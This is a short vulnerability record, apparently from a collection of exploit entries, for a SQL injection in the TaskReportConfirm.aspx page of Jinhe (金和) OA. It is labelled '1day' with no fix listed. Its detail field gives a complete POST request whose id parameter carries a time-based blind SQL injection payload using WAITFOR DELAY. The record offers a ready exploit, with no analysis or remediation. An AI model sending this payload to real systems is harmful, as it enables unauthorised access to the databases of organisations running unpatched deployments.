vendor = "金和"
name = "金和OA TaskReportConfirm.aspx SQL注入"
type = "SQL注入"
version = "未知"
path = "/c6/Jhsoft.Web.dailytaskmanage/TaskReportConfirm.aspx"
detail = "POST /c6/Jhsoft.Web.dailytaskmanage/TaskReportConfirm.aspx/ HTTP/1.1 Host: xxxx.com Content-Type: application/x-www-form-urlencoded __EVENTTARGET=xxxx&__EVENTARGUMENT=&__VIEWSTATE=xxxx&txtTaskReportExplain=&chkCallViewers=on&hidReportID=0&__VIEWSTATEGENERATOR=xxxxx&id='WAitFor DelaY'0:0:5'--"
fix = "未知"
date = "0711"
label = "1day"
verifier = "AdySec"
